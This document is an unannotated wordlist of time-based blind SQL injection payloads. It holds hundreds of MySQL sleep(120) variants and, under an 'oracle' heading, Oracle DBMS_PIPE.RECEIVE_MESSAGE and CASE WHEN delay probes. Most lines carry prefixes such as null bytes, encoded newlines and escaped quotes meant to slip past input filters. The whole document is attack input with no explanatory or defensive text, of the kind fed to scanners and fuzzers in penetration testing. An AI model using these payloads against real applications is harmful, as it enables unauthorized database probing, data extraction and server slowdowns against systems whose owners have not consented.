0x00\\' or sleep(120) -- 
0x00\\';select sleep(120) -- 
0x00sleep(120)
0x00sleep(120) -- 
0x0a and 1337=(select 1337 from (select sleep(120))A)
0x0a and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a and sleep(120)
0x0a and sleep(120) -- 
0x0a or 1337=(select 1337 from (select sleep(120))A)
0x0a or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a or sleep(120)
0x0a or sleep(120) -- 
0x0a' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a' and sleep(120) -- 
0x0a' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a' or sleep(120) -- 
0x0a';select sleep(120) -- 
0x0a;select sleep(120)
0x0a;select sleep(120) -- 
0x0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\' and sleep(120) -- 
0x0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\' or sleep(120) -- 
0x0a\';select sleep(120) -- 
0x0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\\' and sleep(120) -- 
0x0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0a\\' or sleep(120) -- 
0x0a\\';select sleep(120) -- 
0x0asleep(120)
0x0asleep(120) -- 
0x0d0a and 1337=(select 1337 from (select sleep(120))A)
0x0d0a and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a and sleep(120)
0x0d0a and sleep(120) -- 
0x0d0a or 1337=(select 1337 from (select sleep(120))A)
0x0d0a or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a or sleep(120)
0x0d0a or sleep(120) -- 
0x0d0a' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a' and sleep(120) -- 
0x0d0a' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a' or sleep(120) -- 
0x0d0a';select sleep(120) -- 
0x0d0a;select sleep(120)
0x0d0a;select sleep(120) -- 
0x0d0a\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\' and sleep(120) -- 
0x0d0a\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\' or sleep(120) -- 
0x0d0a\';select sleep(120) -- 
0x0d0a\\' and 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\\' and sleep(120) -- 
0x0d0a\\' or 1337=(select 1337 from (select sleep(120))A) -- 
0x0d0a\\' or sleep(120) -- 
0x0d0a\\';select sleep(120) -- 
0x0d0asleep(120)
0x0d0asleep(120) -- 
;select sleep(120)
;select sleep(120) -- 
\' and 1337=(select 1337 from (select sleep(120))A) -- 
\' and sleep(120) -- 
\' or 1337=(select 1337 from (select sleep(120))A) -- 
\' or sleep(120) -- 
\';select sleep(120) -- 
\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\' and sleep(120) -- 
\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\' or sleep(120) -- 
\\';select sleep(120) -- 
\\n and 1337=(select 1337 from (select sleep(120))A)
\\n and 1337=(select 1337 from (select sleep(120))A) -- 
\\n and sleep(120)
\\n and sleep(120) -- 
\\n or 1337=(select 1337 from (select sleep(120))A)
\\n or 1337=(select 1337 from (select sleep(120))A) -- 
\\n or sleep(120)
\\n or sleep(120) -- 
\\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\\n' and sleep(120) -- 
\\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\\n' or sleep(120) -- 
\\n';select sleep(120) -- 
\\n;select sleep(120)
\\n;select sleep(120) -- 
\\n\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\n\\' and sleep(120) -- 
\\n\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\n\\' or sleep(120) -- 
\\n\\';select sleep(120) -- 
\\nsleep(120)
\\nsleep(120) -- 
\\r\\n and 1337=(select 1337 from (select sleep(120))A)
\\r\\n and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n and sleep(120)
\\r\\n and sleep(120) -- 
\\r\\n or 1337=(select 1337 from (select sleep(120))A)
\\r\\n or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n or sleep(120)
\\r\\n or sleep(120) -- 
\\r\\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n' and sleep(120) -- 
\\r\\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n' or sleep(120) -- 
\\r\\n';select sleep(120) -- 
\\r\\n;select sleep(120)
\\r\\n;select sleep(120) -- 
\\r\\n\\' and 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n\\' and sleep(120) -- 
\\r\\n\\' or 1337=(select 1337 from (select sleep(120))A) -- 
\\r\\n\\' or sleep(120) -- 
\\r\\n\\';select sleep(120) -- 
\\r\\nsleep(120)
\\r\\nsleep(120) -- 
\n and 1337=(select 1337 from (select sleep(120))A)
\n and 1337=(select 1337 from (select sleep(120))A) -- 
\n and sleep(120)
\n and sleep(120) -- 
\n or 1337=(select 1337 from (select sleep(120))A)
\n or 1337=(select 1337 from (select sleep(120))A) -- 
\n or sleep(120)
\n or sleep(120) -- 
\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\n' and sleep(120) -- 
\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\n' or sleep(120) -- 
\n';select sleep(120) -- 
\n;select sleep(120)
\n;select sleep(120) -- 
\n\' and 1337=(select 1337 from (select sleep(120))A) -- 
\n\' and sleep(120) -- 
\n\' or 1337=(select 1337 from (select sleep(120))A) -- 
\n\' or sleep(120) -- 
\n\';select sleep(120) -- 
\nsleep(120)
\nsleep(120) -- 
\r\n and 1337=(select 1337 from (select sleep(120))A)
\r\n and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n and sleep(120)
\r\n and sleep(120) -- 
\r\n or 1337=(select 1337 from (select sleep(120))A)
\r\n or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n or sleep(120)
\r\n or sleep(120) -- 
\r\n' and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n' and sleep(120) -- 
\r\n' or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n' or sleep(120) -- 
\r\n';select sleep(120) -- 
\r\n;select sleep(120)
\r\n;select sleep(120) -- 
\r\n\' and 1337=(select 1337 from (select sleep(120))A) -- 
\r\n\' and sleep(120) -- 
\r\n\' or 1337=(select 1337 from (select sleep(120))A) -- 
\r\n\' or sleep(120) -- 
\r\n\';select sleep(120) -- 
\r\nsleep(120)
\r\nsleep(120) -- 
sleep(120)
sleep(120) --

oracle

1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10)-- 1337
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND ('1337'='1337) 
AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),10) AND (1337=1337
 and 1337=dbms_pipe.receive_message(('a'),120)
 and 1337=dbms_pipe.receive_message(('a'),120) -- 
 and 1337=dbms_pipe.receive_message((\'a\'),120)
 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 and 1337=dbms_pipe.receive_message(1,120)
 and 1337=dbms_pipe.receive_message(1,120) -- 
 or 1337=dbms_pipe.receive_message(('a'),120)
 or 1337=dbms_pipe.receive_message(('a'),120) -- 
 or 1337=dbms_pipe.receive_message((\'a\'),120)
 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
 or 1337=dbms_pipe.receive_message(1,120)
 or 1337=dbms_pipe.receive_message(1,120) -- 
%00 and 1337=dbms_pipe.receive_message(('a'),120)
%00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\'a\'),120)
%00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 and 1337=dbms_pipe.receive_message(1,120)
%00 and 1337=dbms_pipe.receive_message(1,120) -- 
%00 or 1337=dbms_pipe.receive_message(('a'),120)
%00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\'a\'),120)
%00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00 or 1337=dbms_pipe.receive_message(1,120)
%00 or 1337=dbms_pipe.receive_message(1,120) -- 
%00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' and 1337=dbms_pipe.receive_message(1,120) -- 
%00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%00' or 1337=dbms_pipe.receive_message(1,120) -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%00\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a and 1337=dbms_pipe.receive_message(1,120)
%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a or 1337=dbms_pipe.receive_message(1,120)
%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a and 1337=dbms_pipe.receive_message(1,120)
%0d%0a and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120)
%0d%0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
%0d%0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a or 1337=dbms_pipe.receive_message(1,120)
%0d%0a or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
%0d%0a' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
%0d%0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
%0d%0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
%0d%0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
%0d%0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
%0d%0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
%0d%0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
%0d%0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
' and 1337=dbms_pipe.receive_message(('a'),120) -- 
' and 1337=dbms_pipe.receive_message(1,120) -- 
' or 1337=dbms_pipe.receive_message(('a'),120) -- 
' or 1337=dbms_pipe.receive_message(1,120) -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00 and 1337=dbms_pipe.receive_message(('a'),120)
0x00 and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 and 1337=dbms_pipe.receive_message(1,120)
0x00 and 1337=dbms_pipe.receive_message(1,120) -- 
0x00 or 1337=dbms_pipe.receive_message(('a'),120)
0x00 or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120)
0x00 or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x00 or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00 or 1337=dbms_pipe.receive_message(1,120)
0x00 or 1337=dbms_pipe.receive_message(1,120) -- 
0x00' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x00' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x00';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x00;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x00\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x00\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x00\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x00\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x00\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x00\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a and 1337=dbms_pipe.receive_message(1,120)
0x0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a or 1337=dbms_pipe.receive_message(1,120)
0x0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a and 1337=dbms_pipe.receive_message(1,120)
0x0d0a and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120)
0x0d0a or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120)
0x0d0a or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a or 1337=dbms_pipe.receive_message(1,120)
0x0d0a or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(('a'),120) -- 
0x0d0a' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual  -- 
0x0d0a';select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
0x0d0a;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
0x0d0a\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
0x0d0a\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
0x0d0a\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' and 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
0x0d0a\\' or 1337=dbms_pipe.receive_message(1,120) -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
0x0d0a\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(('a'),120) else null end from dual -- 
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then 'a'||dbms_pipe.receive_message(1,120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual -- 
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual
;select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual -- 
\' and 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' and 1337=dbms_pipe.receive_message(1,120) -- 
\' or 1337=dbms_pipe.receive_message((\'a\'),120) -- 
\' or 1337=dbms_pipe.receive_message(1,120) -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message((\'a\'),120) else null end from dual  -- 
\';select case when 29=29 then \'a\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\' and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' and 1337=dbms_pipe.receive_message(1,120) -- 
\\' or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\' or 1337=dbms_pipe.receive_message(1,120) -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message((\\'a\\'),120) else null end from dual  -- 
\\';select case when 29=29 then \\'a\\'||dbms_pipe.receive_message(1,120) else null end from dual  -- 
\\n and 1337=dbms_pipe.receive_message(('a'),120)
\\n and 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n and 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n and 1337=dbms_pipe.receive_message(1,120)
\\n and 1337=dbms_pipe.receive_message(1,120) -- 
\\n or 1337=dbms_pipe.receive_message(('a'),120)
\\n or 1337=dbms_pipe.receive_message(('a'),120) -- 
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120)
\\n or 1337=dbms_pipe.receive_message((\\'a\\'),120) -- 
\\n or 1337=dbms_pipe.receive_message(1,120)
\\n or 1337=dbms_pipe.receive_message(1,120) -- 
